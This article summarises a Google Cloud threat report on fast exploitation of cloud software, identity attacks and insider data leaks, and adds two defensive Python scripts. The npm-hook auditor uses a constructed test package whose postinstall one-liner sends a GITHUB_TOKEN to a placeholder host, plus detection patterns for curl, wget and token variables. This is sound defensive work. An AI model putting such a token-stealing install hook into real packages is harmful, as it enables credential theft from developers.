Cloud attacks are accelerating—here’s how to defend

A new Google Cloud Security report warns that the gap between discovering a vulnerability and attackers exploiting it has shrunk from weeks to days, with attacks increasingly aimed at unpatched third-party software and identity weaknesses.
For small and mid-sized businesses, the cloud has always promised speed. But lately, that speed has come with a darker twist: the time between a software flaw being disclosed and it being weaponized is collapsing.
Google Cloud Security’s March 2026 Cloud Threat Horizons Report, built on observations from the second half of 2025, found that “the window between vulnerability disclosure and mass exploitation collapsed by an order of magnitude, from weeks to days.” In other words, the usual rhythm of patching and hardening just isn’t keeping up.
The report’s message is blunt: the most reliable counterpunch won’t be a slower, manual process. It will be defenses that can move automatically, with support from AI. Google Cloud Security argues that organizations should be “turning to more automatic defenses” because activity like probing targets for information, along with a continued emphasis on data-focused theft, suggests attackers are speeding up their workflow, and the safest response has to match it.
Those attacks don’t primarily go after the big, high-profile cloud platforms. The report says threat actors are not targeting the core infrastructure of services like Google Cloud, Amazon Web Services, and Microsoft Azure, which are “well secured.” Instead, they’re exploiting unpatched vulnerabilities in third-party code, exactly the kind of detail most businesses struggle to track across libraries, plugins, and dependencies.
One example involved a critical remote code execution (RCE) vulnerability in React Server Components, a feature of React, the popular JavaScript library used to build user interfaces for websites and mobile apps. Attacks began within 48 hours of the public disclosure of the vulnerability, listed as CVE-2025-55182 and commonly referred to as React2Shell.
Another case centered on an RCE flaw in the XWiki Platform (CVE-2025-24893). Attackers could run arbitrary code on a remote server by sending a specially crafted search string. The bug was patched in June 2024, but the patch wasn’t widely deployed. Exploitation kicked into high gear in November 2025, with attackers, including crypto mining gangs, using it in earnest.
The report also describes a high-stakes operation attributed to UNC4899, a state-sponsored group assessed to be linked to North Korea. The attackers took over Kubernetes workloads to steal millions of dollars in cryptocurrency, and the steps show how a cloud compromise can start far from where the endgame happens.
In that account, UNC4899 lured an unsuspecting developer into downloading an archive file on the pretext of collaborating on an open source project. The developer then transferred the file from their personal device to their corporate workstation over AirDrop. Using an AI-assisted integrated development environment (IDE), the victim interacted with the archive’s contents and eventually executed embedded malicious Python code. That code spawned and executed a binary that masqueraded as kubectl, the Kubernetes command-line tool. The binary beaconed out to UNC4899-controlled domains and served as the backdoor that gave the threat actors access to the victim’s workstation, and with it a foothold into the corporate network.
Speed shows up again in another incident described by the report: attackers compromised an npm (Node Package Manager) package that stole a developer’s GitHub token. They used that token to gain access to Amazon Web Services, stole files stored in an AWS S3 bucket, and then destroyed the originals. The entire sequence happened within 72 hours.
The report’s second major finding is that attackers are leaning harder on identity-related access failures rather than relying solely on brute-force attempts against weak credentials. It breaks down how often different identity techniques appeared: 17% of cases involved voice-based social engineering, also known as vishing; 12% relied on email phishing; 21% involved compromised trusted relationships with third parties; 21% involved actors leveraging stolen human and non-human identities; and 7% resulted from actors gaining access through improperly configured application and infrastructure assets.
And there’s a quieter, increasingly common threat running alongside the outside attacks: malicious insiders. The report notes that employees, contractors, consultants, and interns were sending confidential data outside the organization. The method is often platform-agnostic and consumer-focused, using services such as Google Drive, Dropbox, Microsoft OneDrive, and Apple iCloud. The report calls this “the most rapidly growing means of exfiltrating data from an organization.”
Timing is part of the danger. The report notes that attackers are increasingly taking their time before making their presence known. It states that “45% of intrusions resulted in data theft without immediate extortion attempts at the time of the engagement,” and that these were often characterized by prolonged dwell times and stealthy persistence.
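The npm incident above turns on a package running code at install time with the developer’s environment, including any tokens sitting in it. The script below is an added example (not code from the report, from npm, or from the compromised package) of the audit a practitioner would run before trusting a fresh `node_modules`: it lists every install-time lifecycle hook and rates as “high” any hook that both names a secret-bearing environment variable and reaches the network. The three packages it scans, the environment-variable names and the indicator patterns are constructed assumptions, and `example.invalid` is a placeholder host.

```python
"""Audit a node_modules tree for install-time lifecycle scripts that look like
credential stealers.

Added example, not code from the report or from npm. It reads every
package.json under a directory and reports preinstall/install/postinstall/
prepare hooks. A hook that touches a token-bearing environment variable or
reaches the network is rated "high"; any other hook is rated "review", since
legitimate packages (native add-ons, for instance) use them too. The package
tree, env-var names and patterns below are constructed assumptions.
"""
import json
import os
import re
import tempfile

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Assumed indicators: secrets that commonly sit in a developer's environment,
# and the usual ways a one-liner ships them out.
SECRET_ENV_RE = re.compile(
    r"GITHUB_TOKEN|GH_TOKEN|NPM_TOKEN|NODE_AUTH_TOKEN|"
    r"AWS_(?:ACCESS_KEY_ID|SECRET_ACCESS_KEY|SESSION_TOKEN)"
)
NETWORK_RE = re.compile(r"\bcurl\b|\bwget\b|https?://|require\(['\"]https?['\"]\)|fetch\(")


def scan_package_json(path):
    """Return a list of findings for one package.json (empty if it has no hooks)."""
    with open(path, encoding="utf-8") as fh:
        try:
            meta = json.load(fh)
        except json.JSONDecodeError:
            return []  # npm would not run hooks from a manifest it cannot parse
    scripts = meta.get("scripts") or {}
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str) or not cmd.strip():
            continue
        reasons = []
        if SECRET_ENV_RE.search(cmd):
            reasons.append("references a secret-bearing environment variable")
        if NETWORK_RE.search(cmd):
            reasons.append("makes outbound network access")
        findings.append({
            "package": meta.get("name", "<unnamed>"),
            "version": meta.get("version", "?"),
            "hook": hook,
            "command": cmd,
            "severity": "high" if reasons else "review",
            "reasons": reasons,
        })
    return findings


def scan_tree(root):
    """Walk root (typically a node_modules directory) and collect findings, high first."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" in files:
            findings.extend(scan_package_json(os.path.join(dirpath, "package.json")))
    findings.sort(key=lambda f: (f["severity"] != "high", f["package"]))
    return findings


def build_sample_tree():
    """Construct a throwaway node_modules with three packages (constructed data)."""
    root = tempfile.mkdtemp(prefix="nm-")
    packages = {
        "good-lib": {"name": "good-lib", "version": "1.0.0"},
        "native-addon": {"name": "native-addon", "version": "2.3.1",
                         "scripts": {"install": "node-gyp rebuild"}},
        # Hypothetical stealer: posts the developer's GitHub token to a
        # placeholder host during install.
        "evil-lib": {"name": "evil-lib", "version": "0.0.3", "scripts": {
            "postinstall": "node -e \"require('https').request("
                           "'https://example.invalid/c',{method:'POST'})"
                           ".end(process.env.GITHUB_TOKEN)\""}},
    }
    for name, meta in packages.items():
        pkg_dir = os.path.join(root, "node_modules", name)
        os.makedirs(pkg_dir)
        with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as fh:
            json.dump(meta, fh)
    return root


if __name__ == "__main__":
    for f in scan_tree(build_sample_tree()):
        print(f"[{f['severity']:6}] {f['package']}@{f['version']} {f['hook']}: "
              f"{f['command']}  {'; '.join(f['reasons'])}")
```

A “review” hit is not a verdict; native add-ons legitimately run `node-gyp` at install. The cheap structural control is to install with `npm ci --ignore-scripts` so no hook runs at all, then execute only the hooks you have read, and to keep long-lived tokens out of the shell environment that runs installs.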
So what should businesses do when the window for action is shrinking?
The report says each section includes recommendations for IT professionals to secure cloud infrastructure, split into specific advice for Google Cloud customers and broader guidance for customers using other platforms. For organizations with security teams, those guidelines are meant to be folded into existing security measures.
For small and medium-sized businesses, where security staff may be thin or nonexistent, the report offers four concrete action items. First, step up your patching by ensuring all software applications, especially third-party apps, are updated automatically. Second, strengthen identity and access management by using multi-factor authentication and ensuring only authorized users have access to administrative tools. Third, monitor the network for unusual activity and data movement, covering both attacks from the outside and insider threats. Fourth, have an incident response plan ready at the first sign of an intrusion, because the first few hours can be crucial; if you’re not prepared, scrambling to assemble investigative and containment resources can take days.
If you don’t have security experts on staff, the report’s recommendation is direct: find a managed service provider with the skills and experience you need, and don’t start that search after an attacker has already succeeded.
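The third action item, watching for unusual data movement, is the one that catches the insider exfiltration to consumer storage described earlier. The script below is an added example, not code from the report: it parses proxy-style log lines, sums what each user sent to consumer cloud-storage domains, and flags anyone over a volume threshold. The log format (timestamp, user, method, host, bytes out, bytes in), the domain list and the 50 MiB threshold are assumptions to adapt to your own proxy or firewall export, and the sample log lines are constructed.

```python
"""Flag users moving unusual volumes to consumer cloud-storage services.

Added example, not code from the report. Parses proxy-style log lines, sums
bytes each user sent to consumer storage domains, and reports anyone above a
threshold. The log format (timestamp user method host bytes_out bytes_in),
the domain list and the threshold are assumptions; the sample lines below
are constructed.
"""
from collections import defaultdict

CONSUMER_STORAGE = (
    "drive.google.com", "docs.google.com",
    "dropbox.com", "dropboxapi.com", "dropboxusercontent.com",
    "onedrive.live.com", "icloud.com", "icloud-content.com",
)
UPLOAD_THRESHOLD_BYTES = 50 * 1024 * 1024  # per user over the window scanned (assumed)

# Constructed sample: one large Drive upload, a split Dropbox upload at night,
# an internal build upload that must be ignored, and a malformed line.
SAMPLE_LOG = """\
2025-11-03T09:12:04Z alice POST drive.google.com 73400320 512
2025-11-03T09:15:41Z alice GET drive.google.com 1200 88000
2025-11-03T10:02:19Z bob POST builds.corp.example 9000000 300
2025-11-03T10:04:55Z bob PUT www.icloud.com 2048 120
2025-11-03T22:41:07Z carol POST content.dropboxapi.com 41943040 256
2025-11-03T22:58:30Z carol POST content.dropboxapi.com 20971520 256
2025-11-03T23:01:02Z dave GET www.dropbox.com 300 45000
this line is malformed and should be skipped
"""


def is_consumer_storage(host):
    """True when host is one of the listed domains or a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in CONSUMER_STORAGE)


def parse_line(line):
    """Parse one log line in the assumed format; return None for lines that do not fit."""
    parts = line.split()
    if len(parts) != 6:
        return None
    ts, user, method, host, bytes_out, bytes_in = parts
    if not (bytes_out.isdigit() and bytes_in.isdigit()):
        return None
    return {"ts": ts, "user": user, "method": method, "host": host,
            "bytes_out": int(bytes_out), "bytes_in": int(bytes_in)}


def summarize_uploads(lines):
    """Per-user bytes sent to consumer storage, with hosts and first/last timestamps."""
    totals = defaultdict(lambda: {"bytes_out": 0, "hosts": set(), "first": None, "last": None})
    for line in lines:
        rec = parse_line(line)
        if rec is None or not is_consumer_storage(rec["host"]):
            continue
        entry = totals[rec["user"]]
        entry["bytes_out"] += rec["bytes_out"]
        entry["hosts"].add(rec["host"])
        entry["first"] = entry["first"] or rec["ts"]
        entry["last"] = rec["ts"]
    return totals


def flag_uploads(lines, threshold=UPLOAD_THRESHOLD_BYTES):
    """Users whose consumer-storage upload volume exceeds threshold, largest first."""
    flagged = [
        {"user": user, "bytes_out": e["bytes_out"], "hosts": sorted(e["hosts"]),
         "first": e["first"], "last": e["last"]}
        for user, e in summarize_uploads(lines).items()
        if e["bytes_out"] > threshold
    ]
    return sorted(flagged, key=lambda f: f["bytes_out"], reverse=True)


if __name__ == "__main__":
    for f in flag_uploads(SAMPLE_LOG.splitlines()):
        print(f"{f['user']}: {f['bytes_out'] / 2**20:.1f} MiB to {', '.join(f['hosts'])} "
              f"between {f['first']} and {f['last']}")
```

Summing per user rather than per request is what catches the split upload in the sample: neither of carol’s two Dropbox posts crosses the threshold alone. A fixed byte count is a starting point; in production the threshold should be relative to each user’s own baseline, and the domain list needs the CDN and API hostnames your proxy actually records for these services.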